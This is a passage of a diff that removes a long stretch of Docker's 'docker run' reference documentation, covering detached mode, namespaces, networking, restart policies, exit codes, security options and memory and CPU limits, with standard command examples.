-removed when it stops, this means you cannot use the `--rm` option with `-d` option.
-
-Do not pass a `service x start` command to a detached container. For example, this
-command attempts to start the `nginx` service.
-
-    $ docker run -d -p 80:80 my_image service nginx start
-
-This succeeds in starting the `nginx` service inside the container. However, it
-fails the detached container paradigm in that, the root process (`service nginx
-start`) returns and the detached container stops as designed. As a result, the
-`nginx` service is started but could not be used. Instead, to start a process
-such as the `nginx` web server do the following:
-
-    $ docker run -d -p 80:80 my_image nginx -g 'daemon off;'
-
-To do input/output with a detached container use network connections or shared
-volumes. These are required because the container is no longer listening to the
-command line where `docker run` was run.
-
-To reattach to a detached container, use `docker`
-[*attach*](commandline/attach.md) command.
-
-### Foreground
-
-In foreground mode (the default when `-d` is not specified), `docker
-run` can start the process in the container and attach the console to
-the process's standard input, output, and standard error. It can even
-pretend to be a TTY (this is what most command line executables expect)
-and pass along signals. All of that is configurable:
-
-    -a=[]           : Attach to `STDIN`, `STDOUT` and/or `STDERR`
-    -t              : Allocate a pseudo-tty
-    --sig-proxy=true: Proxy all received signals to the process (non-TTY mode only)
-    -i              : Keep STDIN open even if not attached
-
-If you do not specify `-a` then Docker will [attach to both stdout and stderr
-]( https://github.com/docker/docker/blob/4118e0c9eebda2412a09ae66e90c34b85fae3275/runconfig/opts/parse.go#L267).
-You can specify to which of the three standard streams (`STDIN`, `STDOUT`,
-`STDERR`) you'd like to connect instead, as in:
-
-    $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash
-
-For interactive processes (like a shell), you must use `-i -t` together in
-order to allocate a tty for the container process. `-i -t` is often written `-it`
-as you'll see in later examples.  Specifying `-t` is forbidden when the client
-standard output is redirected or piped, such as in:
-
-    $ echo test | docker run -i busybox cat
-
->**Note**: A process running as PID 1 inside a container is treated
->specially by Linux: it ignores any signal with the default action.
->So, the process will not terminate on `SIGINT` or `SIGTERM` unless it is
->coded to do so.
-
-## Container identification
-
-### Name (--name)
-
-The operator can identify a container in three ways:
-
-| Identifier type       | Example value                                                      |
-| --------------------- | ------------------------------------------------------------------ |
-| UUID long identifier  | "f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778" |
-| UUID short identifier | "f78375b1c487"                                                     |
-| Name                  | "evil_ptolemy"                                                     |
-
-The UUID identifiers come from the Docker daemon. If you do not assign a
-container name with the `--name` option, then the daemon generates a random
-string name for you. Defining a `name` can be a handy way to add meaning to a
-container. If you specify a `name`, you can use it  when referencing the
-container within a Docker network. This works for both background and foreground
-Docker containers.
-
-> **Note**: Containers on the default bridge network must be linked to
-> communicate by name.
-
-### PID equivalent
-
-Finally, to help with automation, you can have Docker write the
-container ID out to a file of your choosing. This is similar to how some
-programs might write out their process ID to a file (you've seen them as
-PID files):
-
-    --cidfile="": Write the container ID to the file
-
-### Image[:tag]
-
-While not strictly a means of identifying a container, you can specify a version of an
-image you'd like to run the container with by adding `image[:tag]` to the command. For
-example, `docker run ubuntu:14.04`.
-
-### Image[@digest]
-
-Images using the v2 or later image format have a content-addressable identifier
-called a digest. As long as the input used to generate the image is unchanged,
-the digest value is predictable and referenceable.
-
-The following example runs a container from the `alpine` image with the
-`sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0` digest:
-
-    $ docker run alpine@sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0 date
-
-## PID settings (--pid)
-
-    --pid=""  : Set the PID (Process) Namespace mode for the container,
-                 'container:<name|id>': joins another container's PID namespace
-                 'host': use the host's PID namespace inside the container
-
-By default, all containers have the PID namespace enabled.
-
-PID namespace provides separation of processes. The PID Namespace removes the
-view of the system processes, and allows process ids to be reused including
-pid 1.
-
-In certain cases you want your container to share the host's process namespace,
-basically allowing processes within the container to see all of the processes
-on the system.  For example, you could build a container with debugging tools
-like `strace` or `gdb`, but want to use these tools when debugging processes
-within the container.
-
-### Example: run htop inside a container
-
-Create this Dockerfile:
-
-```
-FROM alpine:latest
-RUN apk add --update htop && rm -rf /var/cache/apk/*
-CMD ["htop"]
-```
-
-Build the Dockerfile and tag the image as `myhtop`:
-
-```bash
-$ docker build -t myhtop .
-```
-
-Use the following command to run `htop` inside a container:
-
-```
-$ docker run -it --rm --pid=host myhtop
-```
-
-Joining another container's pid namespace can be used for debugging that container.
-
-### Example
-
-Start a container running a redis server:
-
-```bash
-$ docker run --name my-redis -d redis
-```
-
-Debug the redis container by running another container that has strace in it:
-
-```bash
-$ docker run -it --pid=container:my-redis my_strace_docker_image bash
-$ strace -p 1
-```
-
-## UTS settings (--uts)
-
-    --uts=""  : Set the UTS namespace mode for the container,
-           'host': use the host's UTS namespace inside the container
-
-The UTS namespace is for setting the hostname and the domain that is visible
-to running processes in that namespace.  By default, all containers, including
-those with `--network=host`, have their own UTS namespace.  The `host` setting will
-result in the container using the same UTS namespace as the host.  Note that
-`--hostname` is invalid in `host` UTS mode.
-
-You may wish to share the UTS namespace with the host if you would like the
-hostname of the container to change as the hostname of the host changes.  A
-more advanced use case would be changing the host's hostname from a container.
-
-## IPC settings (--ipc)
-
-    --ipc=""  : Set the IPC mode for the container,
-                 'container:<name|id>': reuses another container's IPC namespace
-                 'host': use the host's IPC namespace inside the container
-
-By default, all containers have the IPC namespace enabled.
-
-IPC (POSIX/SysV IPC) namespace provides separation of named shared memory
-segments, semaphores and message queues.
-
-Shared memory segments are used to accelerate inter-process communication at
-memory speed, rather than through pipes or through the network stack. Shared
-memory is commonly used by databases and custom-built (typically C/OpenMPI,
-C++/using boost libraries) high performance applications for scientific
-computing and financial services industries. If these types of applications
-are broken into multiple containers, you might need to share the IPC mechanisms
-of the containers.
-
-## Network settings
-
-    --dns=[]           : Set custom dns servers for the container
-    --network="bridge" : Connect a container to a network
-                          'bridge': create a network stack on the default Docker bridge
-                          'none': no networking
-                          'container:<name|id>': reuse another container's network stack
-                          'host': use the Docker host network stack
-                          '<network-name>|<network-id>': connect to a user-defined network
-    --network-alias=[] : Add network-scoped alias for the container
-    --add-host=""      : Add a line to /etc/hosts (host:IP)
-    --mac-address=""   : Sets the container's Ethernet device's MAC address
-    --ip=""            : Sets the container's Ethernet device's IPv4 address
-    --ip6=""           : Sets the container's Ethernet device's IPv6 address
-    --link-local-ip=[] : Sets one or more container's Ethernet device's link local IPv4/IPv6 addresses
-
-By default, all containers have networking enabled and they can make any
-outgoing connections. The operator can completely disable networking
-with `docker run --network none` which disables all incoming and outgoing
-networking. In cases like this, you would perform I/O through files or
-`STDIN` and `STDOUT` only.
-
-Publishing ports and linking to other containers only works with the default (bridge). The linking feature is a legacy feature. You should always prefer using Docker network drivers over linking.
-
-Your container will use the same DNS servers as the host by default, but
-you can override this with `--dns`.
-
-By default, the MAC address is generated using the IP address allocated to the
-container. You can set the container's MAC address explicitly by providing a
-MAC address via the `--mac-address` parameter (format:`12:34:56:78:9a:bc`).Be
-aware that Docker does not check if manually specified MAC addresses are unique.
-
-Supported networks :
-
-<table>
-  <thead>
-    <tr>
-      <th class="no-wrap">Network</th>
-      <th>Description</th>
-    </tr>
-  </thead>
-  <tbody>
-    <tr>
-      <td class="no-wrap"><strong>none</strong></td>
-      <td>
-        No networking in the container.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>bridge</strong> (default)</td>
-      <td>
-        Connect the container to the bridge via veth interfaces.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>host</strong></td>
-      <td>
-        Use the host's network stack inside the container.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>container</strong>:&lt;name|id&gt;</td>
-      <td>
-        Use the network stack of another container, specified via
-        its <i>name</i> or <i>id</i>.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>NETWORK</strong></td>
-      <td>
-        Connects the container to a user created network (using <code>docker network create</code> command)
-      </td>
-    </tr>
-  </tbody>
-</table>
-
-#### Network: none
-
-With the network is `none` a container will not have
-access to any external routes.  The container will still have a
-`loopback` interface enabled in the container but it does not have any
-routes to external traffic.
-
-#### Network: bridge
-
-With the network set to `bridge` a container will use docker's
-default networking setup.  A bridge is setup on the host, commonly named
-`docker0`, and a pair of `veth` interfaces will be created for the
-container.  One side of the `veth` pair will remain on the host attached
-to the bridge while the other side of the pair will be placed inside the
-container's namespaces in addition to the `loopback` interface.  An IP
-address will be allocated for containers on the bridge's network and
-traffic will be routed though this bridge to the container.
-
-Containers can communicate via their IP addresses by default. To communicate by
-name, they must be linked.
-
-#### Network: host
-
-With the network set to `host` a container will share the host's
-network stack and all interfaces from the host will be available to the
-container.  The container's hostname will match the hostname on the host
-system. Note that `--mac-address` is invalid in `host` netmode. Even in `host`
-network mode a container has its own UTS namespace by default. As such
-`--hostname` is allowed in `host` network mode and will only change the
-hostname inside the container.
-Similar to `--hostname`, the `--add-host`, `--dns`, `--dns-search`, and
-`--dns-option` options can be used in `host` network mode. These options update
-`/etc/hosts` or `/etc/resolv.conf` inside the container. No change are made to
-`/etc/hosts` and `/etc/resolv.conf` on the host.
-
-Compared to the default `bridge` mode, the `host` mode gives *significantly*
-better networking performance since it uses the host's native networking stack
-whereas the bridge has to go through one level of virtualization through the
-docker daemon. It is recommended to run containers in this mode when their
-networking performance is critical, for example, a production Load Balancer
-or a High Performance Web Server.
-
-> **Note**: `--network="host"` gives the container full access to local system
-> services such as D-bus and is therefore considered insecure.
-
-#### Network: container
-
-With the network set to `container` a container will share the
-network stack of another container.  The other container's name must be
-provided in the format of `--network container:<name|id>`. Note that `--add-host`
-`--hostname` `--dns` `--dns-search` `--dns-option` and `--mac-address` are
-invalid in `container` netmode, and `--publish` `--publish-all` `--expose` are
-also invalid in `container` netmode.
-
-Example running a Redis container with Redis binding to `localhost` then
-running the `redis-cli` command and connecting to the Redis server over the
-`localhost` interface.
-
-    $ docker run -d --name redis example/redis --bind 127.0.0.1
-    $ # use the redis container's network stack to access localhost
-    $ docker run --rm -it --network container:redis example/redis-cli -h 127.0.0.1
-
-#### User-defined network
-
-You can create a network using a Docker network driver or an external network
-driver plugin. You can connect multiple containers to the same network. Once
-connected to a user-defined network, the containers can communicate easily using
-only another container's IP address or name.
-
-For `overlay` networks or custom plugins that support multi-host connectivity,
-containers connected to the same multi-host network but launched from different
-Engines can also communicate in this way.
-
-The following example creates a network using the built-in `bridge` network
-driver and running a container in the created network
-
-```
-$ docker network create -d bridge my-net
-$ docker run --network=my-net -itd --name=container3 busybox
-```
-
-### Managing /etc/hosts
-
-Your container will have lines in `/etc/hosts` which define the hostname of the
-container itself as well as `localhost` and a few other common things. The
-`--add-host` flag can be used to add additional lines to `/etc/hosts`.
-
-    $ docker run -it --add-host db-static:86.75.30.9 ubuntu cat /etc/hosts
-    172.17.0.22     09d03f76bf2c
-    fe00::0         ip6-localnet
-    ff00::0         ip6-mcastprefix
-    ff02::1         ip6-allnodes
-    ff02::2         ip6-allrouters
-    127.0.0.1       localhost
-    ::1	            localhost ip6-localhost ip6-loopback
-    86.75.30.9      db-static
-
-If a container is connected to the default bridge network and `linked`
-with other containers, then the container's `/etc/hosts` file is updated
-with the linked container's name.
-
-If the container is connected to user-defined network, the container's
-`/etc/hosts` file is updated with names of all other containers in that
-user-defined network.
-
-> **Note** Since Docker may live update the container’s `/etc/hosts` file, there
-may be situations when processes inside the container can end up reading an
-empty or incomplete `/etc/hosts` file. In most cases, retrying the read again
-should fix the problem.
-
-## Restart policies (--restart)
-
-Using the `--restart` flag on Docker run you can specify a restart policy for
-how a container should or should not be restarted on exit.
-
-When a restart policy is active on a container, it will be shown as either `Up`
-or `Restarting` in [`docker ps`](commandline/ps.md). It can also be
-useful to use [`docker events`](commandline/events.md) to see the
-restart policy in effect.
-
-Docker supports the following restart policies:
-
-<table>
-  <thead>
-    <tr>
-      <th>Policy</th>
-      <th>Result</th>
-    </tr>
-  </thead>
-  <tbody>
-    <tr>
-      <td><strong>no</strong></td>
-      <td>
-        Do not automatically restart the container when it exits. This is the
-        default.
-      </td>
-    </tr>
-    <tr>
-      <td>
-        <span style="white-space: nowrap">
-          <strong>on-failure</strong>[:max-retries]
-        </span>
-      </td>
-      <td>
-        Restart only if the container exits with a non-zero exit status.
-        Optionally, limit the number of restart retries the Docker
-        daemon attempts.
-      </td>
-    </tr>
-    <tr>
-      <td><strong>always</strong></td>
-      <td>
-        Always restart the container regardless of the exit status.
-        When you specify always, the Docker daemon will try to restart
-        the container indefinitely. The container will also always start
-        on daemon startup, regardless of the current state of the container.
-      </td>
-    </tr>
-    <tr>
-      <td><strong>unless-stopped</strong></td>
-      <td>
-        Always restart the container regardless of the exit status, but
-        do not start it on daemon startup if the container has been put
-        to a stopped state before.
-      </td>
-    </tr>
-  </tbody>
-</table>
-
-An ever increasing delay (double the previous delay, starting at 100
-milliseconds) is added before each restart to prevent flooding the server.
-This means the daemon will wait for 100 ms, then 200 ms, 400, 800, 1600,
-and so on until either the `on-failure` limit is hit, or when you `docker stop`
-or `docker rm -f` the container.
-
-If a container is successfully restarted (the container is started and runs
-for at least 10 seconds), the delay is reset to its default value of 100 ms.
-
-You can specify the maximum amount of times Docker will try to restart the
-container when using the **on-failure** policy.  The default is that Docker
-will try forever to restart the container. The number of (attempted) restarts
-for a container can be obtained via [`docker inspect`](commandline/inspect.md). For example, to get the number of restarts
-for container "my-container";
-
-    {% raw %}
-    $ docker inspect -f "{{ .RestartCount }}" my-container
-    # 2
-    {% endraw %}
-
-Or, to get the last time the container was (re)started;
-
-    {% raw %}
-    $ docker inspect -f "{{ .State.StartedAt }}" my-container
-    # 2015-03-04T23:47:07.691840179Z
-    {% endraw %}
-
-
-Combining `--restart` (restart policy) with the `--rm` (clean up) flag results
-in an error. On container restart, attached clients are disconnected. See the
-examples on using the [`--rm` (clean up)](#clean-up-rm) flag later in this page.
-
-### Examples
-
-    $ docker run --restart=always redis
-
-This will run the `redis` container with a restart policy of **always**
-so that if the container exits, Docker will restart it.
-
-    $ docker run --restart=on-failure:10 redis
-
-This will run the `redis` container with a restart policy of **on-failure**
-and a maximum restart count of 10.  If the `redis` container exits with a
-non-zero exit status more than 10 times in a row Docker will abort trying to
-restart the container. Providing a maximum restart limit is only valid for the
-**on-failure** policy.
-
-## Exit Status
-
-The exit code from `docker run` gives information about why the container
-failed to run or why it exited.  When `docker run` exits with a non-zero code,
-the exit codes follow the `chroot` standard, see below:
-
-**_125_** if the error is with Docker daemon **_itself_**
-
-    $ docker run --foo busybox; echo $?
-    # flag provided but not defined: --foo
-      See 'docker run --help'.
-      125
-
-**_126_** if the **_contained command_** cannot be invoked
-
-    $ docker run busybox /etc; echo $?
-    # docker: Error response from daemon: Container command '/etc' could not be invoked.
-      126
-
-**_127_** if the **_contained command_** cannot be found
-
-    $ docker run busybox foo; echo $?
-    # docker: Error response from daemon: Container command 'foo' not found or does not exist.
-      127
-
-**_Exit code_** of **_contained command_** otherwise
-
-    $ docker run busybox /bin/sh -c 'exit 3'; echo $?
-    # 3
-
-## Clean up (--rm)
-
-By default a container's file system persists even after the container
-exits. This makes debugging a lot easier (since you can inspect the
-final state) and you retain all your data by default. But if you are
-running short-term **foreground** processes, these container file
-systems can really pile up. If instead you'd like Docker to
-**automatically clean up the container and remove the file system when
-the container exits**, you can add the `--rm` flag:
-
-    --rm=false: Automatically remove the container when it exits (incompatible with -d)
-
-> **Note**: When you set the `--rm` flag, Docker also removes the volumes
-associated with the container when the container is removed. This is similar
-to running `docker rm -v my-container`. Only volumes that are specified without a
-name are removed. For example, with
-`docker run --rm -v /foo -v awesome:/bar busybox top`, the volume for `/foo` will be removed,
-but the volume for `/bar` will not. Volumes inherited via `--volumes-from` will be removed
-with the same logic -- if the original volume was specified with a name it will **not** be removed.
-
-## Security configuration
-    --security-opt="label=user:USER"     : Set the label user for the container
-    --security-opt="label=role:ROLE"     : Set the label role for the container
-    --security-opt="label=type:TYPE"     : Set the label type for the container
-    --security-opt="label=level:LEVEL"   : Set the label level for the container
-    --security-opt="label=disable"       : Turn off label confinement for the container
-    --security-opt="apparmor=PROFILE"    : Set the apparmor profile to be applied to the container
-    --security-opt="no-new-privileges"   : Disable container processes from gaining new privileges
-    --security-opt="seccomp=unconfined"  : Turn off seccomp confinement for the container
-    --security-opt="seccomp=profile.json": White listed syscalls seccomp Json file to be used as a seccomp filter
-
-
-You can override the default labeling scheme for each container by specifying
-the `--security-opt` flag. Specifying the level in the following command
-allows you to share the same content between containers.
-
-    $ docker run --security-opt label=level:s0:c100,c200 -it fedora bash
-
-> **Note**: Automatic translation of MLS labels is not currently supported.
-
-To disable the security labeling for this container versus running with the
-`--privileged` flag, use the following command:
-
-    $ docker run --security-opt label=disable -it fedora bash
-
-If you want a tighter security policy on the processes within a container,
-you can specify an alternate type for the container. You could run a container
-that is only allowed to listen on Apache ports by executing the following
-command:
-
-    $ docker run --security-opt label=type:svirt_apache_t -it centos bash
-
-> **Note**: You would have to write policy defining a `svirt_apache_t` type.
-
-If you want to prevent your container processes from gaining additional
-privileges, you can execute the following command:
-
-    $ docker run --security-opt no-new-privileges -it centos bash
-
-This means that commands that raise privileges such as `su` or `sudo` will no longer work.
-It also causes any seccomp filters to be applied later, after privileges have been dropped
-which may mean you can have a more restrictive set of filters.
-For more details, see the [kernel documentation](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt).
-
-## Specifying custom cgroups
-
-Using the `--cgroup-parent` flag, you can pass a specific cgroup to run a
-container in. This allows you to create and manage cgroups on their own. You can
-define custom resources for those cgroups and put containers under a common
-parent group.
-
-## Runtime constraints on resources
-
-The operator can also adjust the performance parameters of the
-container:
-
-| Option                     |  Description                                                                                                                                    |
-| -------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- |
-| `-m`, `--memory=""`        | Memory limit (format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M.               |
-| `--memory-swap=""`         | Total memory limit (memory + swap, format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`.         |
-| `--memory-reservation=""`  | Memory soft limit (format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`.                         |
-| `--kernel-memory=""`       | Kernel memory limit (format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M.        |
-| `-c`, `--cpu-shares=0`     | CPU shares (relative weight)                                                                                                                    |
-| `--cpus=0.000`             | Number of CPUs. Number is a fractional number. 0.000 means no limit.                                                                            |
-| `--cpu-period=0`           | Limit the CPU CFS (Completely Fair Scheduler) period                                                                                            |
-| `--cpuset-cpus=""`         | CPUs in which to allow execution (0-3, 0,1)                                                                                                     |
-| `--cpuset-mems=""`         | Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.                                                     |
-| `--cpu-quota=0`            | Limit the CPU CFS (Completely Fair Scheduler) quota                                                                                             |
-| `--cpu-rt-period=0`        | Limit the CPU real-time period. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits.    |
-| `--cpu-rt-runtime=0`       | Limit the CPU real-time runtime. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits.   |
-| `--blkio-weight=0`         | Block IO weight (relative weight) accepts a weight value between 10 and 1000.                                                                   |
-| `--blkio-weight-device=""` | Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`)                                                                          |
-| `--device-read-bps=""`     | Limit read rate from a device (format: `<device-path>:<number>[<unit>]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. |
-| `--device-write-bps=""`    | Limit write rate to a device (format: `<device-path>:<number>[<unit>]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`.  |
-| `--device-read-iops="" `   | Limit read rate (IO per second) from a device (format: `<device-path>:<number>`). Number is a positive integer.                                 |
-| `--device-write-iops="" `  | Limit write rate (IO per second) to a device (format: `<device-path>:<number>`). Number is a positive integer.                                  |
-| `--oom-kill-disable=false` | Whether to disable OOM Killer for the container or not.                                                                                         |
-| `--oom-score-adj=0`        | Tune container's OOM preferences (-1000 to 1000)                                                                                                |
-| `--memory-swappiness=""`   | Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.                                                            |
-| `--shm-size=""`            | Size of `/dev/shm`. The format is `<number><unit>`. `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. |
-
-### User memory constraints
-
-We have four ways to set user memory usage:
-
-<table>
-  <thead>
-    <tr>
-      <th>Option</th>
-      <th>Result</th>
-    </tr>
-  </thead>
-  <tbody>
-    <tr>
-      <td class="no-wrap">
-          <strong>memory=inf, memory-swap=inf</strong> (default)
-      </td>
-      <td>
-        There is no memory limit for the container. The container can use
-        as much memory as needed.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>memory=L&lt;inf, memory-swap=inf</strong></td>
-      <td>
-        (specify memory and set memory-swap as <code>-1</code>) The container is
-        not allowed to use more than L bytes of memory, but can use as much swap
-        as is needed (if the host supports swap memory).
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>memory=L&lt;inf, memory-swap=2*L</strong></td>
-      <td>
-        (specify memory without memory-swap) The container is not allowed to
-        use more than L bytes of memory, swap <i>plus</i> memory usage is double
-        of that.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap">
-          <strong>memory=L&lt;inf, memory-swap=S&lt;inf, L&lt;=S</strong>
-      </td>
-      <td>
-        (specify both memory and memory-swap) The container is not allowed to
-        use more than L bytes of memory, swap <i>plus</i> memory usage is limited
-        by S.
-      </td>
-    </tr>
-  </tbody>
-</table>
-
-Examples:
-
-    $ docker run -it ubuntu:14.04 /bin/bash
-
-We set nothing about memory, this means the processes in the container can use
-as much memory and swap memory as they need.
-
-    $ docker run -it -m 300M --memory-swap -1 ubuntu:14.04 /bin/bash
-
-We set memory limit and disabled swap memory limit, this means the processes in
-the container can use 300M memory and as much swap memory as they need (if the
-host supports swap memory).
-
-    $ docker run -it -m 300M ubuntu:14.04 /bin/bash
-
-We set memory limit only, this means the processes in the container can use
-300M memory and 300M swap memory, by default, the total virtual memory size
-(--memory-swap) will be set as double of memory, in this case, memory + swap
-would be 2*300M, so processes can use 300M swap memory as well.
-
-    $ docker run -it -m 300M --memory-swap 1G ubuntu:14.04 /bin/bash
-
-We set both memory and swap memory, so the processes in the container can use
-300M memory and 700M swap memory.
-
-Memory reservation is a kind of memory soft limit that allows for greater
-sharing of memory. Under normal circumstances, containers can use as much of
-the memory as needed and are constrained only by the hard limits set with the
-`-m`/`--memory` option. When memory reservation is set, Docker detects memory
-contention or low memory and forces containers to restrict their consumption to
-a reservation limit.
-
-Always set the memory reservation value below the hard limit, otherwise the hard
-limit takes precedence. A reservation of 0 is the same as setting no
-reservation. By default (without reservation set), memory reservation is the
-same as the hard memory limit.
-
-Memory reservation is a soft-limit feature and does not guarantee the limit
-won't be exceeded. Instead, the feature attempts to ensure that, when memory is
-heavily contended for, memory is allocated based on the reservation hints/setup.
-
-The following example limits the memory (`-m`) to 500M and sets the memory
-reservation to 200M.
-
-```bash
-$ docker run -it -m 500M --memory-reservation 200M ubuntu:14.04 /bin/bash
-```
-
-Under this configuration, when the container consumes memory more than 200M and
-less than 500M, the next system memory reclaim attempts to shrink container
-memory below 200M.
-
-The following example set memory reservation to 1G without a hard memory limit.
-
-```bash
-$ docker run -it --memory-reservation 1G ubuntu:14.04 /bin/bash
-```
-
-The container can use as much memory as it needs. The memory reservation setting
-ensures the container doesn't consume too much memory for long time, because
-every memory reclaim shrinks the container's consumption to the reservation.
-
-By default, kernel kills processes in a container if an out-of-memory (OOM)
-error occurs. To change this behaviour, use the `--oom-kill-disable` option.
-Only disable the OOM killer on containers where you have also set the
-`-m/--memory` option. If the `-m` flag is not set, this can result in the host
-running out of memory and require killing the host's system processes to free
-memory.
-
-The following example limits the memory to 100M and disables the OOM killer for
-this container:
-
-    $ docker run -it -m 100M --oom-kill-disable ubuntu:14.04 /bin/bash
-
-The following example, illustrates a dangerous way to use the flag:
-
-    $ docker run -it --oom-kill-disable ubuntu:14.04 /bin/bash
-
-The container has unlimited memory which can cause the host to run out memory
-and require killing system processes to free memory. The `--oom-score-adj`
-parameter can be changed to select the priority of which containers will
-be killed when the system is out of memory, with negative scores making them
-less likely to be killed an positive more likely.
-
-### Kernel memory constraints
-
-Kernel memory is fundamentally different than user memory as kernel memory can't
-be swapped out. The inability to swap makes it possible for the container to
-block system services by consuming too much kernel memory. Kernel memory includes：
-
- - stack pages
- - slab pages
- - sockets memory pressure
- - tcp memory pressure
-
-You can setup kernel memory limit to constrain these kinds of memory. For example,
-every process consumes some stack pages. By limiting kernel memory, you can
-prevent new processes from being created when the kernel memory usage is too high.
-
-Kernel memory is never completely independent of user memory. Instead, you limit
-kernel memory in the context of the user memory limit. Assume "U" is the user memory
-limit and "K" the kernel limit. There are three possible ways to set limits:
-
-<table>
-  <thead>
-    <tr>
-      <th>Option</th>
-      <th>Result</th>
-    </tr>
-  </thead>
-  <tbody>
-    <tr>
-      <td class="no-wrap"><strong>U != 0, K = inf</strong> (default)</td>
-      <td>
-        This is the standard memory limitation mechanism already present before using
-        kernel memory. Kernel memory is completely ignored.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>U != 0, K &lt; U</strong></td>
-      <td>
-        Kernel memory is a subset of the user memory. This setup is useful in
-        deployments where the total amount of memory per-cgroup is overcommitted.
-        Overcommitting kernel memory limits is definitely not recommended, since the
-        box can still run out of non-reclaimable memory.
-        In this case, you can configure K so that the sum of all groups is
-        never greater than the total memory. Then, freely set U at the expense of
-        the system's service quality.
-      </td>
-    </tr>
-    <tr>
-      <td class="no-wrap"><strong>U != 0, K &gt; U</strong></td>
-      <td>
-        Since kernel memory charges are also fed to the user counter and reclamation
-        is triggered for the container for both kinds of memory. This configuration
-        gives the admin a unified view of memory. It is also useful for people
-        who just want to track kernel memory usage.
-      </td>
-    </tr>
-  </tbody>
-</table>
-
-Examples:
-
-    $ docker run -it -m 500M --kernel-memory 50M ubuntu:14.04 /bin/bash
-
-We set memory and kernel memory, so the processes in the container can use
-500M memory in total, in this 500M memory, it can be 50M kernel memory tops.
-
-    $ docker run -it --kernel-memory 50M ubuntu:14.04 /bin/bash
-
-We set kernel memory without **-m**, so the processes in the container can
-use as much memory as they want, but they can only use 50M kernel memory.
-
-### Swappiness constraint
-
-By default, a container's kernel can swap out a percentage of anonymous pages.
-To set this percentage for a container, specify a `--memory-swappiness` value
-between 0 and 100. A value of 0 turns off anonymous page swapping. A value of
-100 sets all anonymous pages as swappable. By default, if you are not using
-`--memory-swappiness`, memory swappiness value will be inherited from the parent.
-
-For example, you can set:
-
-    $ docker run -it --memory-swappiness=0 ubuntu:14.04 /bin/bash
-
-Setting the `--memory-swappiness` option is helpful when you want to retain the
-container's working set and to avoid swapping performance penalties.
-
-### CPU share constraint
-
-By default, all containers get the same proportion of CPU cycles. This proportion
-can be modified by changing the container's CPU share weighting relative
-to the weighting of all other running containers.
-
-To modify the proportion from the default of 1024, use the `-c` or `--cpu-shares`
-flag to set the weighting to 2 or higher. If 0 is set, the system will ignore the
-value and use the default of 1024.
-
-The proportion will only apply when CPU-intensive processes are running.
-When tasks in one container are idle, other containers can use the
-left-over CPU time. The actual amount of CPU time will vary depending on
-the number of containers running on the system.
-
-For example, consider three containers, one has a cpu-share of 1024 and
-two others have a cpu-share setting of 512. When processes in all three
-containers attempt to use 100% of CPU, the first container would receive
-50% of the total CPU time. If you add a fourth container with a cpu-share
-of 1024, the first container only gets 33% of the CPU. The remaining containers
-receive 16.5%, 16.5% and 33% of the CPU.
-
-On a multi-core system, the shares of CPU time are distributed over all CPU
-cores. Even if a container is limited to less than 100% of CPU time, it can
-use 100% of each individual CPU core.
-
-For example, consider a system with more than three cores. If you start one
-container `{C0}` with `-c=512` running one process, and another container
-`{C1}` with `-c=1024` running two processes, this can result in the following
-division of CPU shares:
-
-    PID    container	CPU	CPU share
-    100    {C0}		0	100% of CPU0
-    101    {C1}		1	100% of CPU1
-    102    {C1}		2	100% of CPU2
-
-### CPU period constraint
-
-The default CPU CFS (Completely Fair Scheduler) period is 100ms. We can use
-`--cpu-period` to set the period of CPUs to limit the container's CPU usage.
-And usually `--cpu-period` should work with `--cpu-quota`.
-
-Examples:
-
-    $ docker run -it --cpu-period=50000 --cpu-quota=25000 ubuntu:14.04 /bin/bash
-
-If there is 1 CPU, this means the container can get 50% CPU worth of run-time every 50ms.
-
-In addition to use `--cpu-period` and `--cpu-quota` for setting CPU period constraints,
-it is possible to specify `--cpus` with a float number to achieve the same purpose.
-For example, if there is 1 CPU, then `--cpus=0.5` will achieve the same result as
-setting `--cpu-period=50000` and `--cpu-quota=25000` (50% CPU).
-
-The default value for `--cpus` is `0.000`, which means there is no limit.
-
-For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt).
-
-### Cpuset constraint
-
-We can set cpus in which to allow execution for containers.
-
-Examples:
-
-    $ docker run -it --cpuset-cpus="1,3" ubuntu:14.04 /bin/bash
-
-This means processes in container can be executed on cpu 1 and cpu 3.
-
-    $ docker run -it --cpuset-cpus="0-2" ubuntu:14.04 /bin/bash
-
-This means processes in container can be executed on cpu 0, cpu 1 and cpu 2.
-
-We can set mems in which to allow execution for containers. Only effective
-on NUMA systems.
-
-Examples:
-
-    $ docker run -it --cpuset-mems="1,3" ubuntu:14.04 /bin/bash
-
-This example restricts the processes in the container to only use memory from
-memory nodes 1 and 3.
-
-    $ docker run -it --cpuset-mems="0-2" ubuntu:14.04 /bin/bash
-
